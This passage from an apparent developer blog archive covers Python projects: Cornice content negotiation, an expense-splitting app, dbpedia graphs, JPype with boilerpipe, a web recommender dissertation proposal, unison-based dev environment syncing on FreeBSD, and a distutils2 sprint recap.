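def parse_accept(header):
    """Return the media types listed in an Accept header, dropping parameters."""
    return [part.split(";")[0].strip() for part in header.split(",") if part.strip()]


def negotiate(header, supported):
    """Return the first supported type the client accepts, or None (meaning 406)."""
    for wanted in parse_accept(header):
        for candidate in supported:
            if wanted in ("*/*", candidate):
                return candidate
            # "text/*" accepts any candidate starting with "text/".
            if wanted.endswith("/*") and candidate.startswith(wanted[:-1]):
                return candidate
    return None


supported = ("application/json", "text/json")
print(negotiate("application/xml", supported))
print(negotiate("text/*;q=0.5, application/xml", supported))
```

When `negotiate` returns `None`, the service would answer 406 and send back the `supported` list, as in the curl session above.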

Building your documentation automatically

Writing documentation for web services can be painful, especially when your services evolve. Cornice provides a sphinx directive to automatically document your API in your docs.

.. services::
   :package: coolapp
   :service: quote

Here is an example of what a generated page looks like: http://packages.python.org/cornice/exampledoc.html

Yay! How can I get it?

We just cut a 0.4 release, so it’s available at http://pypi.python.org/pypi/cornice. You can install it easily using pip, for instance:

$ pip install cornice

You can also have a look at the documentation at http://packages.python.org/cornice/

What’s next?

We are doing our best to figure out how Cornice can help you build better web services. Cool features we want for the future include the automatic publication of a static definition of the services, so it can be used by clients to discover services in a nice way.

Of course, we are open to all your ideas and patches! If you feel hackish and want to see the sources, go grab them on github, commit and send us a pull request!

How are you handling your shared expenses?

2011-10-15T00:00:00+02:00

TL;DR: We’re kick-starting a new application to manage your shared expenses. Have a look at http://ihatemoney.notmyidea.org

As a student, I lived in a lot of different locations, and the majority of them had something in common: I lived with others. It usually was a great experience (and I think I will continue to live with others). Most of the time, we had to spend some time each month to compute who had to pay what to the others.

I wanted to create a pet project using flask, so I wrote a little (~150 lines) flask application to handle this. It worked out pretty well for my housemates and me, and as we had to move to different places, one of them asked me if he could continue to use it for the year to come.

I said yes and gave it some more thought: we probably aren’t the only ones interested in this kind of software. I decided to extend the software a bit more to add a concept of projects and persons (the list of persons was hard-coded at first, boooh!).

I then discussed it with a friend of mine, who was excited about it and wanted to learn python. Great! That’s a really nice way to get started. Some more friends were also interested in it, contributed some features and provided feedback (thanks Arnaud and Quentin!)

Since then, the project has gained support for multiple languages and a REST API (android and iphone apps are in the pipeline!), among other things. There is no need to register for an account or whatnot: just enter a project name, a secret code and a contact email, invite friends and that’s it (this was inspired by doodle)!

You can try the project at http://ihatemoney.notmyidea.org for now, and the code lives at https://github.com/spiral-project/ihatemoney/.

Features

There are already some implementations of this shared budget manager thing in the wild. The fact is that most of them are either hard to use, have an overly fancy design, or simply try to do too many things at once.

No, I don’t want my budget manager to make my shopping list, or to run a blog for me, thanks. I want it to let me focus on something else. Keep out of my way.

No user registration

You don’t need to register an account on the website to start using it. You just have to create a project, set a secret code for it, and give both the url and the code to the people you want to share it with (or the website can poke them for you).

Keeping things simple

“Keep It Simple, Stupid” really matches our philosophy here: you want to add a bill? Okay. Just do it. You just have to enter who paid, for whom, how much, and a description, like you would on a scrap of paper when you’re back from the farmer’s market.

No categories

Some people like to organise their stuff into different “categories”: leisure, work, eating, etc. That’s not something I want (at least to begin with).

I want things to be simple. Got that? Great. Just add your bills!

Balance

One of the most useful things is knowing your “balance” compared to others. In other words, if you’re negative, you owe money; if you’re positive, you are owed money. This lets you decide who should pay for the next thing, in order to even out the balance.

Additionally, the system is able to compute for you who has to give how much to whom, in order to reduce the number of transactions needed to restore the balance.
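Here is a minimal sketch of how such a computation can work. It is not the code that runs in the project: the `balances` and `settle` functions, the bill format and the names are assumptions made for this example, and `settle` is a simple greedy heuristic (biggest debtor pays biggest creditor) that keeps the number of transfers low without claiming to be optimal in every case.

```python
from fractions import Fraction


def balances(bills):
    """bills: list of (payer, amount_in_cents, [people sharing the bill])."""
    result = {}
    for payer, amount, sharers in bills:
        share = Fraction(amount, len(sharers))  # exact, no float rounding
        result[payer] = result.get(payer, 0) + amount
        for person in sharers:
            result[person] = result.get(person, 0) - share
    return result


def settle(balance):
    """Greedy settlement: return a list of (debtor, creditor, amount)."""
    debtors = [[p, -b] for p, b in balance.items() if b < 0]
    creditors = [[p, b] for p, b in balance.items() if b > 0]
    transfers = []
    while debtors and creditors:
        debtors.sort(key=lambda item: item[1], reverse=True)
        creditors.sort(key=lambda item: item[1], reverse=True)
        debtor, creditor = debtors[0], creditors[0]
        amount = min(debtor[1], creditor[1])
        transfers.append((debtor[0], creditor[0], amount))
        debtor[1] -= amount
        creditor[1] -= amount
        debtors = [d for d in debtors if d[1] > 0]
        creditors = [c for c in creditors if c[1] > 0]
    return transfers


# Made-up bills, amounts in cents.
everyone = ["alexis", "arnaud", "quentin"]
bills = [("alexis", 3000, everyone), ("arnaud", 1200, everyone)]
balance = balances(bills)
transfers = settle(balance)
print(balance)
print(transfers)
```

With these two bills, Alexis ends up positive and the two others negative, so two transfers towards Alexis are enough to restore the balance.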

API

All of what’s possible to do with the standard web interface is also available through a REST API. I developed a simple REST toolkit for flask for this (and I should release it!).

Interested?

This project is open source. All of us like to share what we are doing and would be happy to work with new people and implement new ideas. If you have a nice idea about this, if you want to tweak it or to file bugs, don’t hesitate a second! The project lives at http://github.com/spiral-project/ihatemoney/

Using dbpedia to get language influences

2011-08-16T00:00:00+02:00

While browsing Python’s wikipedia page, I found information about the languages influenced by python, and the languages that influenced python itself.

Well, it’s kind of interesting to know which languages influenced others, but it could be even more interesting to have an overview of the connections between them, keeping python as the main focus.

This information is available on the wikipedia page, but not in a really exploitable format. Fortunately, it is provided in the information box present on the majority of wikipedia pages. And… guess what? There is a project whose goal is to scrape and index all this information in a more queryable way, using semantic web technologies.

Well, you may have guessed it, the project in question is dbpedia, and it exposes information in the form of RDF triples, which are way easier to work with than plain HTML.

For instance, let’s take the page about python: http://dbpedia.org/page/Python_%28programming_language%29

The interesting properties here are “Influenced” and “InfluencedBy”, which allow us to get a list of languages. Unfortunately, they are not really using all the power of the Semantic Web here, and the list is actually a string with comma-separated values in it.

Anyway, we can use a simple rule: all wikipedia pages of programming languages are either named after the language itself, or suffixed with “(programming language)”, which is the case for python.

So I’ve built a tiny script to extract the information from dbpedia and transform it into a shiny graph using graphviz.
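The two ideas above (splitting the comma-separated string and guessing the page name) can be sketched as follows. This is an illustration rather than the actual script: `parse_languages` and `candidate_pages` are hypothetical helper names, and the sample string is made up.

```python
from urllib.parse import quote

BASE = "http://dbpedia.org/page/"


def parse_languages(raw):
    """Split the comma-separated property value into clean language names."""
    return [name.strip() for name in raw.split(",") if name.strip()]


def candidate_pages(language):
    """Return the two page URLs to try: bare name, then the suffixed one."""
    title = language.strip().replace(" ", "_")
    return [
        BASE + quote(title),
        BASE + quote(title + "_(programming_language)"),
    ]


print(parse_languages("ABC, ALGOL 68, C,"))
print(candidate_pages("Python"))
```

A script would then try each candidate in turn and keep the first one that actually describes a programming language.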

After a nice:

$ python get_influences.py python dot | dot -Tpng > influences.png

The result is the following graph (see it directly here)

While reading this diagram, keep in mind that it is a) not listing all the languages and b) keeping a python perspective.

This means that you can trust the diagram when following the arrows from python to something and from something to python; it does not try to show the relations between all the languages at the same time, in order to keep things readable.

It would certainly be possible to show all the connections between all the languages (and the script would even be simpler), but the resulting graph would probably be way less readable.
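For the curious, producing the graphviz input for such a "one language in the middle" graph takes very little code. The sketch below is not the script itself: `to_dot` is a hypothetical function and the language lists passed to it are placeholder data, not what dbpedia returns.

```python
def to_dot(focus, influenced_by, influenced):
    """Return DOT source with arrows going into and out of the focus language."""
    lines = ["digraph influences {"]
    for source in influenced_by:
        lines.append('    "%s" -> "%s";' % (source, focus))
    for target in influenced:
        lines.append('    "%s" -> "%s";' % (focus, target))
    lines.append("}")
    return "\n".join(lines)


# Placeholder data for illustration only.
dot = to_dot("Python", ["ABC"], ["Boo"])
print(dot)
```

The printed text is what gets piped into `dot -Tpng` to draw the picture.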

You can find the script on my github account. Feel free to adapt it for whatever you want if you feel hackish.

Pelican, 9 months later

2011-07-25T00:00:00+02:00

Back in October, I released pelican, a little piece of code I wrote to power this weblog. I had simple needs: I wanted to be able to use my text editor of choice (vim), a vcs (mercurial) and restructured text. I started to write a really simple blog engine in something like a hundred python lines and released it on github.

And people started contributing. I wasn’t at all expecting to see people interested in such a little piece of code, but it turned out that they were. I refactored the code twice to let it evolve a bit more and eventually, in 9 months, got 49 forks, 139 issues and 73 pull requests.

Which is clearly awesome.

I pulled features such as translations, tag clouds, integration with different services such as twitter or piwik, import from dotclear and rss, fixed a number of mistakes and improved the codebase a lot. This was proof that there are a bunch of people willing to make better software just for the fun of it.

Thank you, guys, you’re why I like open source so much.

Using JPype to bridge python and Java

2011-06-11T00:00:00+02:00

Java provides some interesting libraries that have no exact equivalent in python. In my case, the awesome boilerpipe library allows me to remove uninteresting parts of HTML pages, like menus, footers and other “boilerplate” contents.

Boilerpipe is written in Java. Two solutions then: use java from python, or reimplement boilerpipe in python. I will let you guess which one I chose, meh.

JPype lets you bridge a python project with java libraries. It takes a different approach from Jython: rather than reimplementing python in Java, both languages interface at the VM level. This means you need to start a VM from your python script, but it does the job and stays fully compatible with CPython and its C extensions.

First steps with JPype

Once JPype is installed (you’ll have to hack some files a bit to integrate it seamlessly with your system) you can access java classes by doing something like this:

import jpype
jpype.startJVM(jpype.getDefaultJVMPath())

# you can then access the basic java functions
jpype.java.lang.System.out.println("hello world")

# and you have to shutdown the VM at the end
jpype.shutdownJVM()

Okay, now we have a hello world, but what we want seems somehow more complex. We want to interact with java classes, so we will have to load them.

Interfacing with Boilerpipe

To install boilerpipe, you just have to run an ant script:

$ cd boilerpipe
$ ant

Here is a simple example of how to use boilerpipe in Java, from their sources:

package de.l3s.boilerpipe.demo;
import java.net.URL;
import de.l3s.boilerpipe.extractors.ArticleExtractor;

public class Oneliner {
    public static void main(final String[] args) throws Exception {
        final URL url = new URL("http://notmyidea.org");
        System.out.println(ArticleExtractor.INSTANCE.getText(url));
    }
}

To run it:

$ javac -cp dist/boilerpipe-1.1-dev.jar:lib/nekohtml-1.9.13.jar:lib/xerces-2.9.1.jar src/demo/de/l3s/boilerpipe/demo/Oneliner.java
$ java -cp src/demo:dist/boilerpipe-1.1-dev.jar:lib/nekohtml-1.9.13.jar:lib/xerces-2.9.1.jar de.l3s.boilerpipe.demo.Oneliner

Yes, this is kind of ugly, sorry for your eyes. Let’s try something similar, but from python:

import jpype

# start the JVM with the right classpath
classpath = "dist/boilerpipe-1.1-dev.jar:lib/nekohtml-1.9.13.jar:lib/xerces-2.9.1.jar"
jpype.startJVM(jpype.getDefaultJVMPath(), "-Djava.class.path=%s" % classpath)

# get the Java classes we want to use
DefaultExtractor = jpype.JPackage("de").l3s.boilerpipe.extractors.DefaultExtractor

# call them! (parenthesized print works on both python 2 and python 3)
print(DefaultExtractor.INSTANCE.getText(jpype.java.net.URL("http://blog.notmyidea.org")))

And you get what you want.

I must say I didn’t think it could work so easily. This will allow me to extract text content from URLs and remove the boilerplate text easily for infuse (my master thesis project), without having to write java code, nice!
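One small detail about the classpath used above: the `:` separator is what Unix-like systems expect, while Windows uses `;`. A tiny helper can build the JVM option in a portable way. This is only a sketch: `jvm_classpath_option` is a hypothetical name, and it just produces the string that is passed as the second argument to `jpype.startJVM` in the example above.

```python
import os


def jvm_classpath_option(jars):
    """Build the -Djava.class.path option with the platform's path separator."""
    return "-Djava.class.path=" + os.pathsep.join(jars)


jars = [
    "dist/boilerpipe-1.1-dev.jar",
    "lib/nekohtml-1.9.13.jar",
    "lib/xerces-2.9.1.jar",
]
option = jvm_classpath_option(jars)
print(option)
```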

A helping hand for my dissertation!

2011-05-25T00:00:00+02:00

That's it, the end is near. THE END. The end of my studies, and the beginning of everything else. In the meantime I'm working on my final-year dissertation and I could use a little help.

My dissertation is about recommender systems. For those who know last.fm, I'm doing something similar but for websites: based on what you visit daily and how you visit it (what times, what geographic location, etc.), I want to suggest links that may interest you, relying on the opinions of people whose profiles are similar to yours.

The project is far from finished, but the first step is to collect browsing data, ideally a lot of browsing data. So if you can give me a hand I will be eternally grateful (for those pretending not to understand, read “drinks are on me”).

I have set up a small website (in English) that sums up the concept and lets you sign up and download a Firefox plugin that will send me information about the sites you visit (if you usually use Chrome, you might consider switching to Firefox 4 for the next two months to help me out). The plugin can be disabled with a single click if you want to keep your private life private ;-)

The site is over here: http://infuse.notmyidea.org. Once the plugin is downloaded and the account created, you need to enter your credentials in the plugin, and that's all!

Thanks in advance for your generosity! I will probably collect data over the next 2 months and then analyse it properly.

Thanks for your help!

Analyse users’ browsing context to build up a web recommender

2011-04-01T00:00:00+02:00

No, this is not an April Fools’ joke ;)

Wow, it’s been a long time. My year in Oxford is going really well. I realized a few days ago that the end of the year is approaching really quickly. Exams are coming in a month or so, and then I’ll be working full time on my dissertation topic.

When I learned we would have about 6 months to work on something, I first thought about doing something packaging-related, but finally decided to start something new. After all, this is a good time to learn.

For a long time, I’ve been impressed by the last.fm recommender system. They have been scrobbling the music I listen to for something like 5 years now, and their recommendations are really nice and accurate (I discovered a lot of great artists by listening to the “neighbour radio”). (By the way, here is my lastfm account.)

So I decided to work on recommender systems, to better understand what they are about.

Recommender systems are usually used to increase the sales of products (like Amazon.com does), which is not really what I’m looking for (those who know me a bit know I’m kind of sick of all this consumerism going on).

Actually, the simplest thing I thought of was the web: I browse it nearly every day, and new content appears each time. I’ve stopped following my feed reader because of the information overload, and drastically reduced the number of people I follow on twitter.

Too much information kills the information.

You have probably guessed what my dissertation topic will be: a recommender system for the web. Well, such recommender systems already exist, so I will try to add contextual information to them: you’re probably not interested in the same topics at different times of the day, or depending on the computer you’re using. We can also probably make good use of the way you browse to group the content you’re browsing (or even use the great firefox4 tab group feature).

There are also serious concerns to address about users’ privacy.

Here is my proposal (copy/pasted from the one I had to write for my master’s):

Introduction and rationale

Nowadays, people surf the web more and more often. New web pages are created each day, so the amount of information to retrieve grows as time passes. Users browse the web in different contexts, from finding cooking recipes to reading technical articles.

A lot of people share the same interest in various topics, and the quantity of information is such that it’s really hard to triage it efficiently without spending hours doing so: firstly because of the sheer quantity of information, but also because triage is specific to each person. However, this triage can be made easier by fetching the browsing information of individual users and putting it in perspective.

Machine learning is a branch of Artificial Intelligence (AI) which deals with how a program can learn from data. Recommendation systems are a particular application area of machine learning: they recommend things (links in our case) to users, given a database containing the previous choices users have made.

This browsing information is currently available in browsers. Even if it is not in a very usable format, it is possible to transform it into something useful. This information gold mine is just waiting to be used. However, it is not as simple as it may seem at first: it is important to take into account the context the user is in while browsing links. For instance, it’s more likely that during the day a computer scientist will browse computing-related links, and that during the evening he will browse cooking recipes or something else.

Page contents are also interesting to analyse, because that’s what people browse and what actually contains the most interesting part of the information. The raw data extracted from the browsing can then be translated into something more useful (namely tags, type of resource, visit frequency, navigation context, etc.).

The goal of this dissertation is to create a recommender system for web links, including this context information.

At the end of the dissertation, different pieces of software will be provided, from raw data collection from the browser to a recommendation system.

Background Review

This dissertation is mainly about data extraction, analysis and recommendation systems. Two different research areas can be isolated: data preprocessing and information filtering.

The first step in order to make recommendations is to gather some data. The more data we have available, the better (T. Segaran, 2007). This data can be retrieved in various ways; one of them is to get it directly from users’ browsers.

Data preparation and extraction

The data gathered from browsers is basically URLs and additional information about the context of the navigation. There is clearly a need to extract more information about the meaning of the data the user is browsing, starting with the content of the web pages.

Because the information provided on the current Web is not meant to be read by machines (T. Berners-Lee, 2001), there is a need for tools to extract meaning from web pages. The information needs to be preprocessed before being stored in a machine-readable format that makes recommendations possible (Choochart et al., 2004).

Data preparation is composed of two steps: cleaning and structuring (Castellano et al., 2007). Raw data can contain a lot of unneeded text (such as menus, headers, etc.) and needs to be cleaned before being stored. Multiple techniques can be used here; they belong to the fields of boilerplate removal and full text extraction (Kohlschütter et al., 2010).
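To give an idea of what such cleaning can look like, here is a minimal sketch that keeps only text blocks that are long enough and not mostly made of links. It is a deliberately simplified illustration loosely inspired by shallow text features (word count and link density), not the algorithm from the cited paper; the block layout, the function names and both thresholds are assumptions made for the example.

```python
def link_density(words, linked_words):
    """Share of the words in a block that sit inside links."""
    return linked_words / words if words else 1.0


def keep_content_blocks(blocks, min_words=10, max_link_density=0.3):
    """Keep the text of blocks that are long enough and not mostly links.

    `blocks` is a list of (text, linked_words) tuples; both thresholds are
    arbitrary values chosen for the example.
    """
    kept = []
    for text, linked_words in blocks:
        words = len(text.split())
        if words >= min_words and link_density(words, linked_words) <= max_link_density:
            kept.append(text)
    return kept


blocks = [
    ("Home About Archives Contact", 4),  # navigation menu: only links
    ("Unison provides an interesting way to synchronise two folders, "
     "even over a network, so it fits this use case well.", 1),
    ("Powered by something", 3),  # footer
]
content = keep_content_blocks(blocks)
print(content)
```

Only the middle block survives here: the menu and the footer are both too short and too link-heavy.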

Then comes structuring the information: the category and type of content (news, blog, wiki) can be extracted from raw data. This kind of information is not clearly defined by HTML pages, so there is a need for tools to recognise it.

Some context-related information can also be inferred from each resource. It can range from the visit frequency to the navigation group the user was in while browsing. It is also possible to determine whether the user “liked” a resource and to give it a mark, which can be used by information filtering at a later step (T. Segaran, 2007).
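As a rough illustration of this context information, the sketch below derives a visit frequency and a coarse time-of-day context from a list of visits. The record layout (`(url, datetime)` pairs), the function names and the day/evening boundaries are all assumptions made for the example; they are not part of the proposal.

```python
from collections import Counter, defaultdict
from datetime import datetime


def time_of_day(moment):
    """Map a datetime to a coarse context label (boundaries are arbitrary)."""
    if 8 <= moment.hour < 18:
        return "day"
    if 18 <= moment.hour < 23:
        return "evening"
    return "night"


def summarise_visits(visits):
    """Return {url: {"count": n, "contexts": Counter}} for (url, datetime) pairs."""
    summary = defaultdict(lambda: {"count": 0, "contexts": Counter()})
    for url, moment in visits:
        entry = summary[url]
        entry["count"] += 1
        entry["contexts"][time_of_day(moment)] += 1
    return dict(summary)


visits = [
    ("http://docs.python.org", datetime(2011, 4, 1, 10, 30)),
    ("http://docs.python.org", datetime(2011, 4, 1, 14, 5)),
    ("http://recipes.example.org", datetime(2011, 4, 1, 20, 15)),
]
summary = summarise_visits(visits)
print(summary["http://docs.python.org"]["count"])
```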

At this stage, structuring the data is required. Storing this kind of information in an RDBMS can be a bit tedious and requires complex queries to get the data back in a usable format. Graph databases can play a major role in simplifying information storage and querying.

Information filtering

To filter the information, three techniques can be used (Balabanović et al., 1997):

The content-based approach states that if a user has liked something in the past, he is more likely to like similar things in the future. So it’s about establishing a profile for the user and comparing new items against it.
The collaborative approach will rather recommend items that other similar users have liked. This approach considers only the relationships between users, and not the profile of the user we are making recommendations to.
The hybrid approach, which appeared recently, combines both of the previous approaches, giving recommendations when items score high against the user’s profile, or when a similar user already liked them.
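The collaborative approach can be sketched in a few lines. The example below is only one possible take on it (user-based filtering with cosine similarity); the rating data, the user names and the function names are made up for the illustration.

```python
from math import sqrt


def cosine_similarity(ratings_a, ratings_b):
    """Cosine similarity between two {item: score} dictionaries."""
    shared = set(ratings_a) & set(ratings_b)
    if not shared:
        return 0.0
    dot = sum(ratings_a[i] * ratings_b[i] for i in shared)
    norm_a = sqrt(sum(v * v for v in ratings_a.values()))
    norm_b = sqrt(sum(v * v for v in ratings_b.values()))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


def recommend(user, ratings):
    """Rank items the user has not seen by similarity-weighted scores."""
    scores = {}
    for other, other_ratings in ratings.items():
        if other == user:
            continue
        similarity = cosine_similarity(ratings[user], other_ratings)
        if similarity <= 0:
            continue  # users with nothing in common bring no information
        for item, score in other_ratings.items():
            if item not in ratings[user]:
                scores[item] = scores.get(item, 0.0) + similarity * score
    return sorted(scores, key=scores.get, reverse=True)


ratings = {
    "alice": {"python.org": 5, "vim.org": 4},
    "bob": {"python.org": 5, "vim.org": 5, "freebsd.org": 4},
    "carol": {"recipes.example.org": 5},
}
print(recommend("alice", ratings))
```

Here alice is only offered what bob liked, because carol shares no item with her. A content-based approach would instead compare new items with alice's own profile.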

Grouping is also something to consider at this stage (G. Myatt, 2007). Because we are dealing with huge amounts of data, it can be useful to detect groups of data that fit together. Data clustering is able to find such groups (T. Segaran, 2007).

References:

Balabanović, M., & Shoham, Y. (1997). Fab: content-based, collaborative recommendation. Communications of the ACM, 40(3), 66–72. ACM. Retrieved March 1, 2011, from http://portal.acm.org/citation.cfm?id=245108.245124.
Berners-Lee, T., Hendler, J., & Lassila, O. (2001). The semantic web: Scientific american. Scientific American, 284(5), 34–43. Retrieved November 21, 2010, from http://www.citeulike.org/group/222/article/1176986.
Castellano, G., Fanelli, A., & Torsello, M. (2007). LODAP: a LOg DAta Preprocessor for mining Web browsing patterns. Proceedings of the 6th Conference on 6th WSEAS Int. Conf. on Artificial Intelligence, Knowledge Engineering and Data Bases-Volume 6 (p. 12–17). World Scientific and Engineering Academy and Society (WSEAS). Retrieved March 8, 2011, from http://portal.acm.org/citation.cfm?id=1348485.1348488.
Kohlschütter, C., Fankhauser, P., & Nejdl, W. (2010). Boilerplate detection using shallow text features. Proceedings of the third ACM international conference on Web search and data mining (p. 441–450). ACM. Retrieved March 8, 2011, from http://portal.acm.org/citation.cfm?id=1718542.
Myatt, G. J. (2007). Making Sense of Data: A Practical Guide to Exploratory Data Analysis and Data Mining.
Segaran, T. (2007). Collective Intelligence.

Privacy

The first thing that comes to people’s minds when it comes to processing their browsing data is privacy. People don’t want to be stalked. That’s perfectly right, and I don’t either.

But such a system doesn’t have to deal with people’s identities. It’s entirely possible to process completely anonymous data, and that’s probably what I’m gonna do.

By the way, if you have interesting thoughts about that, or if you know of projects that seem related, fire away in the comments!

What’s the plan ?

There are a lot of different things to explore, especially because I’m a complete novice in this field.

I want to develop a firefox plugin to extract the browsing information (I still need to work out exactly which kind of information to retrieve). The idea is to provide some raw browsing data, then to transform it and store it in the best possible way.
Analyse how to store the information in a graph database. What are the different methods to store this data and to visualize the relationships between different pieces of data? How can I define the different contexts, and add that information to the db?
Process the data using well-known recommendation algorithms. Compare the results and assess their value.

There is plenty of stuff I want to try during this experimentation:

I want to try using Gephi to visualize the connections between the links and the contexts
Try using graph databases such as Neo4j
Take a deeper look at tools such as scikit.learn (a machine learning toolkit in python)
Analyse web pages in order to categorize them, and process their contents as well to do some keyword-based classification.

Lots of work on the way, yay!

Working directly on your server? How to backup and sync your dev environment with unison

2011-03-16T00:00:00+01:00

I have had a server running FreeBSD for some time now, and was wondering about the possibility of having a development environment ready to use whenever I get an internet connection, even if I’m not on my own computer.

Since I use vim to code, and spend most of my time in a console while developing, it’s possible to work via ssh, from anywhere.

The only problem is the synchronisation of the source code, config files etc. from my machine to the server.

Unison provides an interesting way to synchronise two folders, even over a network. So let’s do it !

Creating the jail

In case you don’t use FreeBSD, you can skip this section.

# I have a jail flavour named default
$ ezjail-admin create -f default workspace.notmyidea.org 172.19.1.6
$ ezjail-admin start workspace.notmyidea.org

In my case, because the “default” flavour already contains a lot of interesting things, my jail comes already set up with ssh, bash and vim for instance, but you may need to install them yourself.

I want to be redirected to the ssh of the jail when I connect to the host on port 20006. Add these lines to /etc/pf.conf:

    workspace_jail="172.19.1.6"
    rdr on $ext_if proto tcp from any to $ext_ip port 20006 -> $workspace_jail port 22

Reload the packet filter rules:

$ /etc/rc.d/pf reload

Working with unison

Now that we’ve set up the jail, set up unison on the server and on your client. Unison is available in the FreeBSD ports, so just install it:

$ ssh notmyidea.org -p 20006
$ make -C /usr/ports/net/unison-nox11 config-recursive
$ make -C /usr/ports/net/unison-nox11 package-recursive

Install unison on your local machine as well. Double-check that you install the same version on the client and on the server. Ubuntu ships both 2.27.57 and 2.32.52.

Check that unison is installed and reachable via ssh from your machine:

$ ssh notmyidea.org -p 20006 unison -version
unison version 2.27.57
$ unison -version
unison version 2.27.57

Let’s sync our folders

The first thing I want to sync is my vim configuration. Well, it’s already in a git repository but let’s try to use unison for it right now.

So I have two machines: workspace, the jail, and ecureuil, my laptop.

unison .vim ssh://notmyidea.org:20006/.vim
unison .vimrc ssh://notmyidea.org:20006/.vimrc

It is also possible to put all the information in a config file, and then to simply run unison (fire up vim ~/.unison/default.prf).

Here is my config:

    root = /home/alexis
    root = ssh://notmyidea.org:20006

    path = .vimrc
    path = dotfiles
    path = dev

    follow = Name *

My vimrc is in fact a symbolic link on my laptop, but I don’t want to specify each of the links to unison. That’s what follow = Name * is for.
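If you keep several such profiles, the file can also be generated. Here is a minimal sketch that writes the same kind of profile from a list of roots and paths; the function name `build_profile` and its arguments are made up for the example, and only the `root`, `path` and `follow` preferences shown above are used.

```python
def build_profile(roots, paths, follow_all_links=True):
    """Return the text of a unison profile for two roots and some paths."""
    if len(roots) != 2:
        raise ValueError("a profile needs exactly two roots")
    lines = ["root = {0}".format(root) for root in roots]
    lines.append("")
    lines.extend("path = {0}".format(path) for path in paths)
    if follow_all_links:
        # follow every symbolic link instead of listing them one by one
        lines.append("")
        lines.append("follow = Name *")
    return "\n".join(lines) + "\n"


profile = build_profile(
    ["/home/alexis", "ssh://notmyidea.org:20006"],
    [".vimrc", "dotfiles", "dev"],
)
print(profile)
```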

The folders you want to synchronize may be a bit large. If so, considering other options such as rsync for the first import may be a good idea (I enjoyed my university’s huge upload bandwidth to upload 2GB in 20 minutes ;)

Run the script frequently

Once that’s done, you just need to run the unison command line from time to time, whenever you want to sync your two machines. I’ve written a tiny script to get some feedback from the sync:

import os
from datetime import datetime

DEFAULT_LOGFILE = "~/unison.log"
PROGRAM_NAME = "Unison syncer"

def sync(logfile=DEFAULT_LOGFILE, program_name=PROGRAM_NAME):
    # init
    display_message = True
    error = False

    before = datetime.now()
    # call unison to make the sync
    os.system('unison -batch > {0}'.format(logfile))

    # get the duration of the operation, in whole seconds
    delta = int((datetime.now() - before).total_seconds())

    # check what was the last entry in the log
    with open(os.path.expanduser(logfile)) as log:
        lines = log.readlines()
    if lines and 'No updates to propagate' in lines[-1]:
        display_message = False
    else:
        output = [l.strip() for l in lines if "Synchronization" in l]
        if output:
            message = output[-1]
        else:
            # no summary line in the log: something went wrong
            error = True
            message = "Sync failed, see {0}.".format(logfile)
        message += " It took {0}s.".format(delta)

    if display_message:
        os.system('notify-send -i {2} "{0}" "{1}"'.format(program_name, message,
            'error' if error else 'info'))

if __name__ == "__main__":
    sync()

This could probably be improved, but it does the job.
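One possible improvement is to pull the log parsing out into a small pure function, which can then be tried without running unison at all. This is only a sketch: the function name `summarise_log` and the sample log lines are made up, and only the two markers the script already looks for ("No updates to propagate" and "Synchronization") are taken from it.

```python
def summarise_log(lines):
    """Return the message to notify, or None when nothing was propagated."""
    if not lines:
        return "The log is empty."
    if "No updates to propagate" in lines[-1]:
        return None
    summaries = [line.strip() for line in lines if "Synchronization" in line]
    return summaries[-1] if summaries else "No summary line found in the log."


# Hypothetical log contents, only shaped like what the script expects
quiet_log = ["Looking for changes\n", "No updates to propagate\n"]
busy_log = ["Looking for changes\n", "Synchronization complete (1 item transferred)\n"]
print(summarise_log(quiet_log))
print(summarise_log(busy_log))
```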

The last step is to tell your machine to run that frequently. That’s what crontab is made for, so let’s crontab -e:

    * */3 * * * . ~/.Xdbus; /usr/bin/python /home/alexis/dev/python/unison-syncer/sync.py

The ~/.Xdbus file allows cron to communicate with your X11 session. Here is its content:

#!/bin/bash

# Get the pid of nautilus
nautilus_pid=$(pgrep -u $LOGNAME -n nautilus)

# If nautilus isn't running, just exit silently
if [ -z "$nautilus_pid" ]; then
exit 0
fi

# Grab the DBUS_SESSION_BUS_ADDRESS variable from nautilus's environment
eval $(tr '\0' '\n' < /proc/$nautilus_pid/environ | grep '^DBUS_SESSION_BUS_ADDRESS=')

# Check that we actually found it
if [ -z "$DBUS_SESSION_BUS_ADDRESS" ]; then
echo "Failed to find bus address" >&2
exit 1
fi

# export it so that child processes will inherit it
export DBUS_SESSION_BUS_ADDRESS

And it comes from here.

A sync takes about 20s plus the upload time on my machine, which stays acceptable for all of my developments.

Wrap up of the distutils2 paris’ sprint

2011-02-08T00:00:00+01:00

Finally, thanks to a bunch of people who helped me pay for my train and bus tickets, I made it to Paris for the distutils2 sprint.

A bit more than 10 people came to the sprint, and it was very productive. Here’s a taste of what we’ve been working on:

the datafiles, a way to specify and to handle the installation of files which are not python-related (pictures, manpages and so on).
mkcfg, a tool to help you create a setup.cfg in minutes (and with funny examples)
converters from setup.py scripts. We now have a piece of code which reads your current setup.py file and fills in some fields in the setup.cfg for you.
a compatibility layer for distutils1, so it can read the setup.cfg you will write for distutils2 :-)
the uninstaller, so it’s now possible to uninstall what has been installed by distutils2 (see PEP 376)
the installer, and the setuptools compatibility layer, which will allow you to rely on setuptools-based distributions (and there are plenty of them!)
the compilers, so they are more flexible than they were. Since that’s an obscure part of the code for distutils2 committers (it comes directly from the distutils1 ages), having some guys who understood the issues here was a must.

Some people have also tried to port their packaging from distutils1 to distutils2. They have spotted a number of bugs and made some improvements to the code, to make it more friendly to use.

I’m really pleased to see how newcomers went through the code and started hacking so fast. I must say it wasn’t the case when we started to work on distutils1, so that’s a very good point: people can now hack the code quicker than they could before.

Some of the features here are not completely finished yet, but they are in the pipeline and will be ready for a release (hopefully) at the end of the week.

Big thanks to logilab for hosting (and sponsoring my train ticket) and providing us food, and to bearstech for providing some money for breakfast and bears^Wbeers.

Again, a big thanks to all the people who gave me money to pay for the transport, I really wasn’t expecting such a thing to happen :-)

PyPI on CouchDB

2011-01-20T00:00:00+01:00

Currently, there are two ways to retrieve data from PyPI (the Python Package Index). You can rely either on XML/RPC or on the “simple” API. The simple API is not as simple to use as the name suggests, and has several drawbacks.

Basically, if you want to use information coming from the simple API, you have to parse web pages manually and extract information using some black voodoo magic. Sadly, magic has a price, and it’s sometimes impossible to get exactly the information you want from this index. That’s the technique currently used by distutils2, setuptools and pip.

On the other hand, while XML/RPC works fine, it requires extra work from the python servers each time you request something, which can lead to outages from time to time. Also, it’s important to point out that, even though PyPI has a mirroring infrastructure, it only covers the so-called simple API, not XML/RPC.

CouchDB

